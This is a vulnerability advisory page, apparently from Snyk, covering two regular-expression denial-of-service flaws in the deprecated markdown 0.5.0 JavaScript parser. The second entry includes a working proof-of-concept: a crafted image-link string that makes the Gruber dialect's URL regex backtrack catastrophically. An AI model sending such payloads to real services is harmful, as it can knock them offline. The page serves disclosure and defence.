markdown@0.5.0 vulnerabilities

A sensible Markdown parser for javascript

Direct Vulnerabilities

Known vulnerabilities in the markdown package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Regular Expression Denial of Service (ReDoS)

markdown is a yet another markdown parser, this time for JavaScript.

Note: This package is no longer actively maintained and should be considered deprecated.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The markdown.toHTML() function has significantly degraded performance when parsing long strings containing underscores. This may lead to ReDoS if the parser accepts user input.

How to fix Regular Expression Denial of Service (ReDoS)?

There is no fixed version for markdown.

*
  • M
Regular Expression Denial of Service (ReDoS)

markdown is a yet another markdown parser, this time for JavaScript.

Note: This package is no longer actively maintained and should be considered deprecated.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It is possible under certain circumstances to abuse the URL regex parse functionality available within the Gruber dialect feature to conduct denial of service attacks.

Note: Exploitation of this vulnerability requires usage of the Gruber dialect (dialects/gruber.js) within markdown, which is not available by default.

PoC by Snyk

console.time('benchmark');
//regex taken from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L12

var urlRegexp = /(?:(?:https?|ftp):\/\/)(?:\S+(?::\S*)?@)?(?:(?!(?:10|127)(?:\.\d{1,3}){3})(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))|(?:(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)*(?:\.(?:[a-z\u00a1-\uffff]{2,})))(?::\d{2,5})?(?:\/[^\s]*)?/i.source;

//expoit/payload
const str = '![Blat Blat](https://192.168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689268192.1 "Blat Blat")';

//Duplicate of code from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L566

var m = str.match(new RegExp("^!\\[(.*?)][ \\t]*\\((" + urlRegexp + ")\\)([ \\t])*([\"'].*[\"'])?")) ||
        str.match( /^!\[(.*?)\][ \t]*\([ \t]*([^")]*?)(?:[ \t]+(["'])(.*?)\3)?[ \t]*\)/ );
console.timeEnd('benchmark');

How to fix Regular Expression Denial of Service (ReDoS)?

There is no fixed version for markdown.

*